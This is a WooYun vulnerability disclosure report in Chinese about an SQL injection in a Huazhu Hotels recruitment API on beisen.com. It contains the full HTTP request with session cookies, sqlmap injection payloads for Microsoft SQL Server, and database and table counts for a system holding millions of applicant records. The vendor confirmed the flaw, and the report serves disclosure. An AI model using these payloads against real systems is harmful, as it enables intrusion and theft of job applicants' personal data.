当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0184337

漏洞标题:华住酒店某处接口SQL注入漏洞

相关厂商:汉庭酒店

漏洞作者: Looke

提交时间:2016-03-13 21:22

修复时间:2016-04-28 16:09

公开时间:2016-04-28 16:09

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-13: 细节已通知厂商并且等待厂商处理中
2016-03-14: 厂商已经确认,细节仅向厂商公开
2016-03-24: 细节向核心白帽子及相关领域专家公开
2016-04-03: 细节向普通白帽子公开
2016-04-13: 细节向实习白帽子公开
2016-04-28: 细节向公众公开

简要描述:

RT

详细说明:

漏洞位置:

1.jpg


2.jpg


漏洞地址:

POST /api/InternalInfo/InternalRecommendJobAdListForPy HTTP/1.1
Accept-Language: zh-CN
X-Requested-With: XMLHttpRequest
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://recruitofficer.tms.beisen.com/PyInternal/RecommendList?From=Custom
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; MI NOTE LTE Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Origin: http://recruitofficer.tms.beisen.com
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Host: recruitofficer.tms.beisen.com
Cookie: beisenBusiType=JRv3/pK7NziIls4YxGA20w==; beisenCache6=C4SrRW0T8K1c+nNU0WUJlNVchab9/ID4p/t53IGXkzqVYvI+LRIurtLiFgdyfNJCMAaNkLRPys6hSetzj30FJMcPz8HiQSy3cz/pQ/4/rSMdh6NQI8XUJDC1wGGGm14XEBNNImV1PdiGp4tZNxR4krTgDoxwiwJ1uPcxPz2/zUFeWtFlig4nH1ZfNqtF7tC02G2myFiAktQfDFCfp0WQGplKcea6B3pKTIscGXvZNuHdCpjb6EZ8D5btrAOI4yuLEDI1u2PGJgseabEgimWZF/AROVhscEWCXGnBRI1dNVLcwFp598/kAd9TzJuhnKSi6hbvklSFc/MRsgLKdJMEa81u8rIsMijhJcpi5hmdzAs=; beisenVersion=sV0zQHmV7HA8ZV5SYGkVgA==; gr_session_id_e30f00323ed092421ec53b5aa52e4465=7820e748-50a0-4591-88e2-188433c35cd7; gr_user_id=3547aaf3-91c3-4793-a649-be6a8582fe89
Content-Length: 53
pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7*


name参数存在注入

---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 3354=CONVERT(INT,(SELECT CH
AR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3354=3354) THEN CHAR(49) ELSE CHA
R(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113))) AND '%'='
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 4713=(SELECT COUNT(*) FROM
sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys
6,sysusers AS sys7) AND '%'='
---
[20:30:16] [INFO] testing Microsoft SQL Server
[20:30:16] [INFO] confirming Microsoft SQL Server
[20:30:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008

漏洞证明:

数据库:

数据库.jpg


数据信息很大的说,看下面,至于都有哪些信息,你们比我更懂,仅作测试,未dump数据库,日志可查,求个高rank可好?

Database: BeisenRecruitment001
+-------------------------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------------------------+---------+
| dbo.Rel_ObjectDataOfApplicant | 21910244 |
| dbo.StandardResumeDetailValue | 18802224 |
| dbo.RelationHistory | 11254767 |
| dbo.ApplyDocument | 7516347 |
| dbo.ApplicantHistory | 6111962 |
| dbo.ApplicantHistoryDigest | 5173063 |
| dbo.PhaseTransferHistory | 4925655 |
| dbo.REL_PersonJobStoreDB | 4376542 |
| dbo.ResumeExperience | 4144101 |
| dbo.ApplicantImportCenterInfo | 2715594 |
| dbo.ResumeEducation | 2707816 |
| dbo.Rel_ObjectDataOfApply | 2616834 |
| dbo.SearchCV | 2605691 |
| dbo.SearchCVExtend | 2601771 |
| dbo.ApplicantProfileLite | 2590488 |
| dbo.StandradResumeValue | 2469684 |
| dbo.REL_PersonJobHistory | 2425882 |
| dbo.PersonApplyStat | 1998890 |
| dbo.MailMessage | 1339401 |
| dbo.GenericExtendCounter | 1256675 |
| dbo.PendingPerson | 1179443 |
| dbo.ResumeProject | 1056161 |
| dbo.PersonStoreDbHistory | 938211 |
| dbo.ApplicantImportCenter | 285102 |
| dbo.SerialNumber | 266092 |
| dbo.SynchronizeApplicant_SearchCV_GetPersonID_ParametersLog | 259574 |
| dbo.SerialNumberHistory | 243251 |
| dbo.MessageSentHistory | 240622 |
| dbo.REL_BeisenUserID | 233569 |
| dbo.InterviewHistory | 146300 |
| dbo.Relation_Interview_Interviewee | 131212 |
| dbo.Remark | 116225 |
| dbo.JobRelationOperationHistory | 107369 |
| dbo.Rel_PersonAndResumeFilter | 89735 |
| dbo.TitaTaskManage | 81698 |
| dbo.AppMessage | 78557 |
| dbo.InterviewInfoHistroy | 76967 |
| dbo.InterviewInfo | 73927 |
| dbo.ProxyLog | 73015 |
| dbo.Relation_Interview_RemindJob | 72799 |
| dbo.ReplyRecord | 62606 |
| dbo.DownLoadedResume | 61974 |
| dbo.ProcessPhaseStatusConfig | 60397 |
| dbo.Counter_2 | 53073 |
| dbo.Relation_Interview_Interviewer | 51759 |
| dbo.ReplySetHistory | 48092 |
| dbo.Rel_PhaseAndStatus | 45542 |
| dbo.InterviewEvaluateResult | 43635 |
| dbo.UploadedAttachment | 40956 |
| dbo.ReplyMessageInfo | 35024 |
| dbo.InterviewerReplySendRecord | 33324 |
| dbo.JobAdChannel_Class | 28797 |
| dbo.JobAD | 27143 |
| dbo.JobADLoc | 25640 |
| dbo.Rel_ProcessAndPhase | 24893 |
| dbo.InterviewFeedBack | 24355 |
| dbo.JobAd_External | 23578 |
| dbo.JobBrowseLog | 22272 |
| dbo.Job | 19671 |
| dbo.ProcessPhase | 19285 |
| dbo.ProcessStatus | 19110 |
| dbo.JobADAdditionalObject | 17633 |
| dbo.ResumeTempFolder | 17386 |
| dbo.ResumeFilter | 16533 |
| dbo.WechatUserAndPerson | 15892 |
| dbo.ReportLog | 15809 |
| dbo.Rel_ResumeTempFolderAndUser | 15744 |
| dbo.EmaiJobRule | 15392 |
| dbo.JobLoc | 12968 |
| dbo.ProcessReason | 11750 |
| dbo.JobAdChannel_Apply | 10986 |
| dbo.Officer | 10885 |
| dbo.Rel_StatusAndReason | 10446 |
| dbo.ResumeDownload | 9883 |
| dbo.REL_ObjectId_ShareGroupId | 9232 |
| dbo.OfferHistory | 9049 |
| dbo.InterviewerReply | 8989 |
| dbo.BatchRankingScore | 7436 |
| dbo.RecieveSummary | 7283 |
| dbo.Rel_ApplicantAndLabel | 7135 |
| dbo.REL_JobAndInterviewEvaluation | 6754 |
| dbo.SendMailLog | 6420 |
| dbo.InterviewEvaluationDetailItem | 6050 |
| dbo.ExportHistory | 5984 |
| dbo.ApplicantViewCondition | 5980 |
| dbo.ConstItem | 5913 |
| dbo.TitaPorjectManage | 5753 |
| dbo.Permission | 5176 |
| dbo.EffectiveOffer | 4958 |
| dbo.EffectiveOfferApply | 4898 |
| dbo.RecruitProcess | 4599 |
| dbo.HrJobBrowseLog | 4484 |
| dbo.OfferAssesment | 4049 |
| dbo.OfferCreaterMailInfo | 3849 |
| dbo.Offer | 3779 |
| dbo.Interview | 3595 |
| dbo.AutoInvitTest | 3348 |
| dbo.ApplicantView | 3009 |
| dbo.Rel_InternalRecommend | 2994 |
| dbo.OfferApply | 2849 |
| dbo.Relation_InterviewMessage_Interviewee | 2627 |
| dbo.StoreDB | 2440 |
| dbo.Finder | 2141 |
| dbo.SearchFieldOption | 1956 |
| dbo.StaticizeLog | 1899 |
| dbo.Attention | 1852 |
| dbo.BizLookLog | 1711 |
| dbo.ChannelRelation | 1657 |
| dbo.MicroProcessMessageLog | 1335 |
| dbo.InterviewLocation | 1316 |
| dbo.RewardRulesSublist | 1098 |
| dbo.StatisticsThisMonth | 1035 |
| dbo.JobADPostUserName | 919 |
| dbo.ConstItemId | 825 |
| dbo.ApplicantLock | 739 |
| dbo.RecruitPackage | 716 |
| dbo.ChannelAuthorize | 691 |
| dbo.ChannelSource | 677 |
| dbo.ExamRoomPlan | 666 |
| dbo.InterviewInfoType | 632 |
| dbo.BadMessage | 604 |
| dbo.InterviewSession | 573 |
| dbo.MicroProcessActivity | 566 |
| dbo.BlackListHistory | 545 |
| dbo.RewardRules | 457 |
| dbo.RecuritProject | 440 |
| dbo.BlackList | 419 |
| dbo.MicroProcess | 360 |
| dbo.ExportFieldTemplate | 357 |
| dbo.WebotSyncRecord | 336 |
| dbo.ChannelDeliveryMapping | 310 |
| dbo.InterviewEvaluationPartItem | 309 |
| dbo.GlobalSetting | 296 |
| dbo.ResumeKeywordsLibrary | 294 |
| dbo.HunterAccount | 249 |
| dbo.Label | 242 |
| dbo.MailReceiveStrategy | 238 |
| dbo.ReceiveEmailList | 238 |
| dbo.IndexMap | 192 |
| dbo.JobTitleLibrary | 185 |
| dbo.Duty | 182 |
| dbo.ReSendEmailOrSmsHistory | 177 |
| dbo.StandardResumeDetailField | 157 |
| dbo.Station | 141 |
| dbo.ConstType | 136 |
| dbo.CadidateId | 131 |
| dbo.InterviewEvaluationBasicInfo | 126 |
| dbo.JobTemplate | 125 |
| dbo.SelectAllPageErrorInfo | 121 |
| dbo.InterviewEvaluate | 101 |
| dbo.InterviewSite | 97 |
| dbo.MarketActivity | 96 |
| dbo.WeChatOfficer_MyRecommend_CountResult | 73 |
| dbo.FromList | 56 |
| dbo.Requirement | 56 |
| dbo.TalentMining | 52 |
| dbo.WeChatOfficer_PyInternal_CountResult | 49 |
| dbo.Relation_InterviewMessage_Officer | 47 |
| dbo.InterviewEvaluationDictDetial | 40 |
| dbo.Assesment | 39 |
| dbo.InterviewSite_Officers | 36 |
| dbo.ExamRoom | 28 |
| dbo.RestTime | 28 |
| dbo.Widget_Option | 28 |
| dbo.Medium | 27 |
| dbo.RankAndFilter | 25 |
| dbo.Invitation | 23 |
| dbo.ApplicantLockSet | 18 |
| dbo.WeChatOfficer_RedEnvelopes | 16 |
| dbo.RankingScoreHistory | 15 |
| dbo.StandardResumeDetailSection | 14 |
| dbo.ActionTiggerCondition | 13 |
| dbo.ActionForSendNotification | 11 |
| dbo.RecuritProjectCondition | 11 |
| dbo.AutoTask | 10 |
| dbo.Functions | 10 |
| dbo.ChannelKind | 9 |
| dbo.StandardResumeField | 9 |
| dbo.MediumGroup | 8 |
| dbo.Widget | 7 |
| dbo.InterviewEvaluationDictType | 4 |
| dbo.TaskItem | 3 |
| dbo.AccessmentResultForUpdateApply | 2 |
| dbo.DefaultEmailReceiveStrategy | 2 |
| dbo.InterviewEamilEvaluation | 1 |
+-------------------------------------------------------------+---------+
Database: msdb
+-------------------------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------------------------+---------+
| dbo.backupfile | 975572 |
| dbo.backupset | 487786 |
| dbo.backupmediafamily | 487783 |
| dbo.backupmediaset | 487783 |
| dbo.restorefile | 68 |
| dbo.restorefilegroup | 34 |
| dbo.restorehistory | 34 |
| dbo.syspolicy_configuration | 4 |
+-------------------------------------------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 Looke@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-03-14 16:09

厂商回复:

您好!感谢对华住酒店集团的关注,此问题己移交相关团队跟进处理。

最新状态:

暂无